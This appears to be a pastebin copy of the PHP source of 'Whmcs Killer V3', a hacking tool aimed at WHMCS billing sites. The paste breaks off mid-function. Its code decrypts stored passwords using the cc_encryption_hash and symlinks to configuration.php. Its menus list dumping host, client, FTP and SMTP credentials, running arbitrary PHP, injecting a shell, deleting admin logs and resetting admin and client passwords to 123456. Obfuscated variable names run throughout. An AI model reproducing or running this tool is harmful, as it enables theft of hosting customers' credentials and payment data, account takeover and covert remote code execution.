SHOW:
|
|
- or go back to the newest paste.
1 | <?php | |
2 | ${"GLOBALS"}["outicdmnc"] = "ii"; | |
3 | ${"GLOBALS"}["utbtewtqar"] = "bg"; | |
4 | ${"GLOBALS"}["rgwyiylp"] = "total_pages"; | |
5 | ${"GLOBALS"}["yqutalc"] = "bg2"; | |
6 | ${"GLOBALS"}["jqnmewjo"] = "num"; | |
7 | ${"GLOBALS"}["kxrlsu"] = "col1"; | |
8 | ${"GLOBALS"}["bqfsvypmmd"] = "sql"; | |
9 | ${"GLOBALS"}["nhatbrs"] = "table"; | |
10 | ${"GLOBALS"}["ihymmcbnbwl"] = "sql1"; | |
11 | function login() | |
12 | { | |
13 | echo "<center><div id='content' class='box'><br><center><h3 class=\"tit\">DB configuration of WHMCS</h3><br></center><FORM action=\"\" method=\"post\" ><input type=\"hidden\" name=\"form_action\" value=\"1\"><br><table ><tr class='bg'><td>Database Host </td><td><input type=\"text\" size=\"60\" name=\"db_host\" value=\"" . $_COOKIE["db_host"] . "\"></td></tr><tr ><td>Database Username </td><td><input type=\"text\" size=\"60\" name=\"db_username\" value=\"" . $_COOKIE["db_username"] . "\"></td></tr><tr class='bg'><td>Database Password</td><td><input type=\"text\" size=\"60\" name=\"db_password\" value=\"" . $_COOKIE["db_password"] . "\"></td></tr><tr><td>Database Name</td><td><input type=\"text\" size=\"60\" name=\"db_name\" value=\"" . $_COOKIE["db_name"] . "\"></td></tr><tr class='bg'><td>cc_encryption_hash</td><td><input type=\"text\" size=\"60\" name=\"cc_encryption_hash\" value=\"" . $_COOKIE["cc_encryption_hash"] . "\"></td></tr></table<br><INPUT class=\"input-submit\" type=\"submit\" value=\"Submit\" name=\"Submit\"></FORM><h3 class=\"tit\">Symlink to configuration.php of WHMCS</h3><br><FORM action=\"\" method=\"post\"><input type=\"hidden\" name=\"form_action\" value=\"2\"><br> <table ><tr class='bg'><td><input type=\"text\" size=\"30\" name=\"file\" value=\"\"><br> </td><td><INPUT class=\"input-submit\" type=\"submit\" value=\"Submit\" name=\"Submit\"></td></tr></table></FORM>"; | |
14 | if ($_COOKIE["login"] == "1") { | |
15 | $key = $_COOKIE["db_name"] . "-" . base64_encode(base64_encode($_COOKIE["db_host"]) . "|" . base64_encode($_COOKIE["db_username"]) . "|" . base64_encode($_COOKIE["db_password"]) . "|" . base64_encode($_COOKIE["db_name"]) . "|" . base64_encode($_COOKIE["cc_encryption_hash"]) . "|"); | |
16 | echo "<p class='msg info'>Short info is <br><textarea cols=50 rows='4'>$key</textarea></p><br>"; | |
17 | } | |
18 | echo "<h3 class=\"tit\">Short info</h3><FORM action=\"\" method=\"post\"><input type=\"hidden\" name=\"form_action\" value=\"3\"><br> <table ><tr class='bg'><td><input type=\"text\" size=\"60\" name='key' ></td><td></td><td><INPUT class=\"input-submit\" type=\"submit\" value=\"Submit\" name=\"Submit\"></td></tr></table></FORM></center></div><br>"; | |
19 | echo "</div> <!-- /cols --><hr class=\"noscreen\" /><!-- Footer --><div id=\"footer\" class=\"box\"><p class=\"f-left\">Coded by <a href=\"http://www.rab3oun.net\">RAB3OUN</a>, </p><p class=\"f-right\">Templates by Adminizio</p></div> <!-- /footer --></div> <!-- /main --></body></html>"; | |
20 | } | |
21 | ${"GLOBALS"}["xgolbbovnt"] = "title"; | |
22 | ${"GLOBALS"}["tiozloyd"] = "create"; | |
23 | ${"GLOBALS"}["vccjfiiqqv"] = "page"; | |
24 | ${"GLOBALS"}["ejbqmv"] = "col"; | |
25 | ${"GLOBALS"}["ixziiviuycx"] = "where"; | |
26 | ${"GLOBALS"}["nptouqgsvo"] = "start_from"; | |
27 | ${"GLOBALS"}["hdpvrycfg"] = "line"; | |
28 | ${"GLOBALS"}["envupsjdgmq"] = "query"; | |
29 | ${"GLOBALS"}["kzpczwgflxjo"] = "total_records"; | |
30 | ${"GLOBALS"}["cmrxvpt"] = "k"; | |
31 | ${"GLOBALS"}["plkahzbtei"] = "x"; | |
32 | ${"GLOBALS"}["jshmnvixsqk"] = "value"; | |
33 | ${"GLOBALS"}["kwxopsllwn"] = "q"; | |
34 | ${"GLOBALS"}["jftdiqsydd"] = "where2"; | |
35 | ||
36 | function decrypt($string, $cc_encryption_hash) | |
37 | { | |
38 | $key = md5(md5($cc_encryption_hash)) . md5($cc_encryption_hash); | |
39 | $hash_key = _hash($key); | |
40 | $hash_length = strlen($hash_key); | |
41 | $string = base64_decode($string); | |
42 | $tmp_iv = substr($string, 0, $hash_length); | |
43 | $string = substr($string, $hash_length, strlen($string) - $hash_length); | |
44 | $iv = $out = ""; | |
45 | $c = 0; | |
46 | while ($c < $hash_length) { | |
47 | $iv .= chr(ord($tmp_iv[$c]) ^ ord($hash_key[$c])); | |
48 | ++$c; | |
49 | } | |
50 | $key = $iv; | |
51 | $c = 0; | |
52 | while ($c < strlen($string)) { | |
53 | if (($c != 0 AND $c % $hash_length == 0)) { | |
54 | $key = _hash($key . substr($out, $c - $hash_length, $hash_length)); | |
55 | } | |
56 | $out .= chr(ord($key[$c % $hash_length]) ^ ord($string[$c])); | |
57 | ++$c; | |
58 | } | |
59 | return $out; | |
60 | } | |
61 | ${"GLOBALS"}["ieqlmszh"] = "db"; | |
62 | ${"GLOBALS"}["lrhfsm"] = "head"; | |
63 | ||
64 | function _hash($string) | |
65 | { | |
66 | if (function_exists("sha1")) { | |
67 | $hash = sha1($string); | |
68 | } else { | |
69 | $hash = md5($string); | |
70 | } | |
71 | $out = ""; | |
72 | $c = 0; | |
73 | while ($c < strlen($hash)) { | |
74 | $out .= chr(hexdec($hash[$c] . $hash[$c + 1])); | |
75 | $c += 2; | |
76 | } | |
77 | return $out; | |
78 | } | |
79 | ${"GLOBALS"}["tbjbrlvq"] = "item"; | |
80 | ${"GLOBALS"}["qhvkuofdkk"] = "columns"; | |
81 | function randomt() | |
82 | { | |
83 | $chars = "abcdefghijkmnopqrstuvwxyz023456789"; | |
84 | srand((double) microtime() * 1000000); | |
85 | $i = 0; | |
86 | $pass = ""; | |
87 | while ($i <= 7) { | |
88 | $num = rand() % 33; | |
89 | $tmp = substr($chars, $num, 1); | |
90 | $pass = $pass . $tmp; | |
91 | $i++; | |
92 | } | |
93 | return $pass; | |
94 | } | |
95 | ${"GLOBALS"}["bwjpbyzycqo"] = "r"; | |
96 | ${"GLOBALS"}["wmumpttm"] = "fp"; | |
97 | function header2() | |
98 | { | |
99 | global $currentFile; | |
100 | echo "<html><title>Whmcs Killer V3 (Coded by RAB3OUN)</title><head>"; | |
101 | echo "<link rel=\"stylesheet\" media=\"screen,projection\" type=\"text/css\" href=\"" . $currentFile . "?css=1\" /> <link rel=\"stylesheet\" media=\"screen,projection\" type=\"text/css\" href=\"" . $currentFile . "?css=5\" /> <link rel=\"stylesheet\" media=\"screen,projection\" type=\"text/css\" href=\"" . $currentFile . "?css=4\" title=\"2col\" /><link rel=\"alternate stylesheet\" media=\"screen,projection\" type=\"text/css\" href=\"" . $currentFile . "?css=3\" title=\"1col\" /> <link rel=\"stylesheet\" media=\"screen,projection\" type=\"text/css\" href=\"" . $currentFile . "?css=2\" /> "; | |
102 | echo "<style>#content {border:1px solid #afafaf; background:#fff;width:650;}</style><meta http-equiv='Content-Type' content='text/html; charset=utf-8' /></head><body ><center><img src='?img=0'></center>"; | |
103 | } | |
104 | ${"GLOBALS"}["pcpbwvmdq"] = "v"; | |
105 | ${"GLOBALS"}["bftufbeb"] = "qq"; | |
106 | function header1() | |
107 | { | |
108 | global $currentFile; | |
109 | @$query0 = mysql_query("SELECT value FROM tblconfiguration where setting='Charset' or setting='charset'"); | |
110 | @$v0 = mysql_fetch_array($query0); | |
111 | $charset = $v0["value"] ? $v0["value"] : "utf-8"; | |
112 | echo "<?xml version=\"1.0\"?><!DOCTYPE html PUBLIC \"-//W3C//DTD XHTML 1.0 Strict//EN\" \"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd\"><html xmlns=\"http://www.w3.org/1999/xhtml\" xml:lang=\"en\" lang=\"en\"><head><meta http-equiv=\"Content-Type\" content=\"text/html; charset=" . $charset . "\" /><meta http-equiv=\"content-language\" content=\"en\" /><meta name=\"robots\" content=\"noindex,nofollow\" /><link rel=\"stylesheet\" media=\"screen,projection\" type=\"text/css\" href=\"" . $currentFile . "?css=1\" /> <!-- RESET --><link rel=\"stylesheet\" media=\"screen,projection\" type=\"text/css\" href=\"" . $currentFile . "?css=5\" /> <!-- MAIN STYLE SHEET --><link rel=\"stylesheet\" media=\"screen,projection\" type=\"text/css\" href=\"" . $currentFile . "?css=4\" title=\"2col\" /> <!-- DEFAULT: 2 COLUMNS --><link rel=\"alternate stylesheet\" media=\"screen,projection\" type=\"text/css\" href=\"" . $currentFile . "?css=3\" title=\"1col\" /> <!-- ALTERNATE: 1 COLUMN --><link rel=\"stylesheet\" media=\"screen,projection\" type=\"text/css\" href=\"" . $currentFile . "?css=2\" /> <!-- GRAPHIC THEME --> <title>Whmcs Killer V3 (Coded by RAB3OUN)</title></head><body><div id=\"main\"><?<!-- Tray --><div id=\"tray\" class=\"box\"><p class=\"f-left box\"> <strong>WHMCS KILLER V3 </strong></p><p class=\"f-right\"> <strong><a href=\"?p=9\" id=\"logout\">Log out</a></strong></p></div> <!-- /tray --><hr class=\"noscreen\" /><center><img src=\"?img=0\"></center><hr class=\"noscreen\" /><!-- Columns --><div id=\"cols\" class=\"box\"><!-- Aside (Left Column) --><div id=\"aside\" class=\"box\"><div class=\"padding box\"></div> <!-- /padding --><ul class=\"box\">"; | |
113 | $menu = array( | |
114 | "h" => "Home", | |
115 | "102" => "Info", | |
116 | "1" => "H0st r00ts", | |
117 | "2" => "Domains Resellers", | |
118 | "3" => "Clients r00ts", | |
119 | "4" => "Clients Hosting Accounts", | |
120 | "63" => "Clients Tickets ", | |
121 | "100" => "Clients List ", | |
122 | "105" => "Clients Password", | |
123 | "7" => "FTP and SMTP password", | |
124 | "8" => "Tools", | |
125 | "101" => "Eval PHP", | |
126 | "99\" target=\"blank\"=>\"SQL", | |
127 | "11" => "BackUp", | |
128 | "106" => "DailyEmailBackup", | |
129 | "108" => "1nj3c7 Sh311", | |
130 | "109" => "Payment Gateways", | |
131 | "111" => "Addon Modules", | |
132 | "107" => "Index", | |
133 | "112" => "Custom Fields" | |
134 | ); | |
135 | if ($_COOKIE["login"] <> "1") | |
136 | $menu = array( | |
137 | "c1" => "Db Config", | |
138 | "c2" => "Symlink to configuration.php of WHMCS", | |
139 | "c3" => "Short info" | |
140 | ); | |
141 | foreach ($menu as $x => $y) { | |
142 | if ($_GET["p"] == $x) { | |
143 | echo ("<li id='submenu-active'><a href=\"?p=$x\"> $y</a>"); | |
144 | } else { | |
145 | echo ("<li ><a href=\"?p=$x\" > $y</a>"); | |
146 | } | |
147 | if (($x == 8)) { | |
148 | echo "<ul>"; | |
149 | echo "<li><a href=\"?p=8&page=1\" > Upload</a></li> <li><a href=\"?p=8&page=2\" >Delete Adminlog </a></li><li><a href=\"?p=8&page=3\" >Change Admin Password to 123456</a></li><li><a href=\"?p=8&page=4\" >Change Client Password to 123456</a></li><li><a href=\"?p=8&page=5\" >Change Client Mail </a></li><li><a href=\"?p=8&page=6\" >Decrypt Password</a></li>"; | |
150 | echo "</ul>"; | |
151 | echo "</li>"; | |
152 | } else { | |
153 | echo "</li>"; | |
154 | } | |
155 | } | |
156 | echo "</ul></div> <!-- /aside --><hr class=\"noscreen\" /><!-- Content (Right Column) --><div id=\"content\" class=\"box\">"; | |
157 | } | |
158 | function actionSql() | |
159 | { | |
160 | $_POST["p2"] = stripslashes($_POST["p2"]); | |
161 | ${"GLOBALS"}["dsvjvi"] = "tmp"; | |
162 | echo "<script> var c_ = '" . htmlspecialchars($GLOBALS["cwd"]) . "'; var a_ = '" . htmlspecialchars(@$_POST["a"]) . "' var charset_ = '" . htmlspecialchars(@$_POST["charset"]) . "'; var p1_ = '" . ((strpos(@$_POST["p1"], "") !== false) ? "" : htmlspecialchars($_POST["p1"], ENT_QUOTES)) . "'; var p2_ = '" . ((strpos(@$_POST["p2"], "") !== false) ? "" : htmlspecialchars($_POST["p2"], ENT_QUOTES)) . "'; var p3_ = '" . ((strpos(@$_POST["p3"], "") !== false) ? "" : htmlspecialchars($_POST["p3"], ENT_QUOTES)) . "'; var d = document;function set(a,c,p1,p2,p3,charset) {if(a!=null)d.mf.a.value=a;else d.mf.a.value=a_;if(c!=null)d.mf.c.value=c;else d.mf.c.value=c_;if(p1!=null)d.mf.p1.value=p1;else d.mf.p1.value=p1_;if(p2!=null)d.mf.p2.value=p2;else d.mf.p2.value=p2_;if(p3!=null)d.mf.p3.value=p3;else d.mf.p3.value=p3_;if(charset!=null)d.mf.charset.value=charset;else d.mf.charset.value=charset_;}function g(a,c,p1,p2,p3,charset) {set(a,c,p1,p2,p3,charset);d.mf.submit();}function a(a,c,p1,p2,p3,charset) {set(a,c,p1,p2,p3,charset);var params = 'ajax=true';for(i=0;i<d.mf.elements.length;i++)params += '&'+d.mf.elements[i].name+'='+encodeURIComponent(d.mf.elements[i].value);sr('" . addslashes($_SERVER["REQUEST_URI"]) . "', params);}function sr(url, params) {if (window.XMLHttpRequest)req = new XMLHttpRequest();else if (window.ActiveXObject)req = new ActiveXObject('Microsoft.XMLHTTP'); if (req) { req.onreadystatechange = processReqChange; req.open('POST', url, true); req.setRequestHeader ('Content-Type', 'application/x-www-form-urlencoded'); req.send(params); }}function processReqChange() {if( (req.readyState == 4) )if(req.status == 200) {var reg = new RegExp(\"(\\\d+)([\\\S\\\\s]*)\", 'm');var arr=reg.exec(req.responseText);eval(arr[2].substr(0, arr[1]));} else alert('Request error!');}</script><html><title>Whmcs Killer V3 (Coded by RAB3OUN)</title><head><style>body{background: #0f0e0d;color: #FF9933;padding: 0px;}a:link, body_alink{color: #FF9933;text-decoration: none;}a:visited, body_avisited{color: #FF9933;text-decoration: none;}a:hover, a:active, body_ahover{color: #FFFFFF;text-decoration: none;}th:hover{background: #524f46;text-decoration: none;}td, th, p, li,table{background: #2e2b28;border:1px solid #524f46;}input{border: 1px solid;cursor: default;overflow: hidden;background: #2e2b28;color: #ffffff;}</style><head><body><div style='position:absolute;width:100%;top:0;left:0;'><form method=post name=mf style='display:none;'><input type=hidden name=a><input type=hidden name=c><input type=hidden name=p1><input type=hidden name=p2><input type=hidden name=p3><input type=hidden name=charset></form>"; | |
163 | class DbClass | |
164 | { | |
165 | var $type; | |
166 | var $link; | |
167 | var $res; | |
168 | function DbClass($type) | |
169 | { | |
170 | $this->type = $type; | |
171 | } | |
172 | function connect($host, $user, $pass, $dbname) | |
173 | { | |
174 | switch ($this->type) { | |
175 | case "mysql": | |
176 | if ($this->link = @mysql_connect($host, $user, $pass, true)) | |
177 | return true; | |
178 | break; | |
179 | case "pgsql": | |
180 | $host = explode(":", $host); | |
181 | if (!$host[1]) | |
182 | $host[1] = 5432; | |
183 | if ($this->link = @pg_connect("host={$host[0]} port={$host[1]} user=$user password=$pass dbname=$dbname")) | |
184 | return true; | |
185 | break; | |
186 | //================================ PAYMENT ================================== |